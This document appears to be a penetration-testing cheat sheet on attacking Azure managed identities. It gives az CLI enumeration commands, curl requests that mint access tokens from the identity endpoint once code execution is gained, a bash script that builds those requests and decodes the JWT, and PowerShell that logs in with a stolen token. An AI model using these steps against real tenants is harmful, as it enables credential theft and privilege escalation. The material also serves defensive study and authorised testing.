If a resource needs access to another system, such as a web app that needs database access, you can give it a "managed identity": an Entra ID service principal whose credentials Azure manages for you. The resource authenticates to other Azure resources by requesting tokens from a local identity endpoint instead of holding a stored secret. An identity is either system-assigned (tied to one resource and deleted with it) or user-assigned (a standalone resource that can be attached to several). From an attacker's point of view, code execution on the resource means you can mint tokens as that identity and inherit every RBAC role assigned to it.
Enumeration
Azure CLI
List all applications (without --all only the first 100 are returned)
az ad app list
az ad app list --query "[].[displayName,appId]" -o table
Get app information
az ad app show --id <app-id>
Search apps by name
az ad app list --all --query "[?contains(displayName,'Test')].displayName"
Get owner of an app
az ad app owner list --id <app-id> --query "[].[displayName]" -o table
Get apps owned by current user
az ad app list --show-mine
Get apps registered with a secret or certificate (only metadata such as keyId and endDateTime is returned, never the secret value itself)
az ad app list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
Get all user-assigned managed identities with their service principal (principalId) and clientId
az identity list --output table
System-assigned identities are not separate resources and do not appear in that list; they show up on the owning resource, e.g. az vm identity show --name <vm> --resource-group <rg> or az webapp identity show --name <app> --resource-group <rg>.
Identify
If you get code execution on a resource, check the environment variables for
IDENTITY_HEADER=
IDENTITY_ENDPOINT=
(App Service, Azure Functions and similar platform services), or the older
MSI_ENDPOINT=
MSI_SECRET=
On a VM or VM scale set there are no such variables: the identity endpoint is the fixed link-local IMDS address http://169.254.169.254/metadata/identity/oauth2/token, reachable only from inside the VM and requiring the request header Metadata: true.
Exploit
The endpoint and header let code on the resource ask the local identity endpoint for an access token scoped to a resource (audience). Anything the identity has access to can be targeted, for example the Azure Resource Manager API:
curl -s -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://management.azure.com/"
or Azure Key Vault:
curl -s -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://vault.azure.net"
With the legacy MSI_* variables the header is literally named secret and the API version differs:
curl -s -H "secret: $MSI_SECRET" "$MSI_ENDPOINT?api-version=2017-09-01&resource=https://management.azure.com/"
The reply is JSON carrying access_token and expires_on. Decode the JWT payload (base64url) to see who you are and what the token is good for: aud is the audience you requested, oid the identity's service principal object ID, appid its client ID, tid the tenant and exp the expiry. The token does not list Azure RBAC permissions; those live as role assignments on the principal, so enumerate them from the management plane once authenticated, or simply try the actions you care about. If the resource has several user-assigned identities, add client_id=<clientId> to the query string to choose which one issues the token.
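The identification checks and the token requests above, put together as an added example (this script is mine, not the page's): it picks the request shape for whichever identity endpoint the environment exposes, falls back to the VM IMDS address when no variables are set, extracts access_token from the JSON reply and decodes the JWT payload without jq, so aud, oid, appid and exp can be read on a bare container. The sample JWT and JSON reply in the block are constructed for the demonstration; the GUIDs and the signature segment are placeholders, and the request is printed rather than executed so it can be reviewed before running it with eval.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): locate the managed-identity
# endpoint, build the token request for a given resource, and inspect the JWT.

# Print the curl command for the identity endpoint flavour present in the
# environment. Run the live request with: eval "$(mi_token_cmd https://vault.azure.net)"
mi_token_cmd() {
  local resource="${1:-https://management.azure.com/}"
  if [ -n "${IDENTITY_ENDPOINT:-}" ] && [ -n "${IDENTITY_HEADER:-}" ]; then
    # App Service / Functions / Container Apps: 2019-08-01 API, X-IDENTITY-HEADER
    printf 'curl -s -H "X-IDENTITY-HEADER: %s" "%s?api-version=2019-08-01&resource=%s"\n' \
      "$IDENTITY_HEADER" "$IDENTITY_ENDPOINT" "$resource"
  elif [ -n "${MSI_ENDPOINT:-}" ] && [ -n "${MSI_SECRET:-}" ]; then
    # Legacy App Service MSI: 2017-09-01 API, header literally named "secret"
    printf 'curl -s -H "secret: %s" "%s?api-version=2017-09-01&resource=%s"\n' \
      "$MSI_SECRET" "$MSI_ENDPOINT" "$resource"
  else
    # Azure VM / VMSS: no variables, fixed link-local IMDS address, Metadata header
    printf 'curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=%s"\n' \
      "$resource"
  fi
}

# Pull access_token out of the endpoint's JSON reply (sed only, no jq).
access_token_from() {
  printf '%s' "$1" | sed -n -E 's/.*"access_token":"([^"]*)".*/\1/p'
}

# Decode the JWT payload: second dot-separated segment, base64url -> base64
# (swap -_ for +/ and restore the stripped '=' padding), then base64-decode.
jwt_payload() {
  local seg
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done
  printf '%s' "$seg" | base64 -d
}

# Read one top-level claim (quoted string or bare number) from the payload.
jwt_claim() {
  jwt_payload "$1" | sed -n -E "s/.*\"$2\":\"?([^\",}]*)\"?.*/\1/p"
}

# Exit 0 when the token's exp is in the past (time to request a fresh one).
jwt_expired() {
  local exp
  exp=$(jwt_claim "$1" exp)
  [ "$exp" -le "$(date +%s)" ]
}

# --- constructed sample data so the script runs stand-alone; real tokens are signed ---
b64url() { base64 | tr -d '\n=' | tr '+/' '-_'; }
SAMPLE_HEADER=$(printf '%s' '{"typ":"JWT","alg":"RS256"}' | b64url)
SAMPLE_PAYLOAD=$(printf '%s' '{"aud":"https://management.azure.com/","oid":"11111111-1111-1111-1111-111111111111","appid":"22222222-2222-2222-2222-222222222222","tid":"33333333-3333-3333-3333-333333333333","exp":1700000000}' | b64url)
SAMPLE_JWT="${SAMPLE_HEADER}.${SAMPLE_PAYLOAD}.c2lnbmF0dXJl"   # dummy signature segment
SAMPLE_REPLY="{\"access_token\":\"${SAMPLE_JWT}\",\"expires_on\":\"1700000000\",\"resource\":\"https://management.azure.com/\",\"token_type\":\"Bearer\"}"

# Typical flow against the constructed reply (live: reply=$(eval "$(mi_token_cmd)"))
token=$(access_token_from "$SAMPLE_REPLY")
printf 'aud=%s oid=%s appid=%s tid=%s\n' \
  "$(jwt_claim "$token" aud)" "$(jwt_claim "$token" oid)" "$(jwt_claim "$token" appid)" "$(jwt_claim "$token" tid)"
jwt_expired "$token" && echo "token expired, request a fresh one"
```

The claims tell you which principal you are (oid, appid) and which tenant you are in, which is what you need to look up the identity's role assignments from the management plane; they do not tell you what it may do.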
Auth with token
# Az PowerShell; the token must have been issued for https://management.azure.com/.
# -AccountId is mandatory next to -AccessToken but is not validated, so any label works.
$accesstoken = "<YOUR-TOKEN>"
$accountid = "managed-identity"
Connect-AzAccount -AccessToken $accesstoken -AccountId $accountid
# A Key Vault token (resource=https://vault.azure.net) is passed separately via -KeyVaultAccessToken.
Check access
Get-AzResource   # lists every resource the identity's role assignments let it read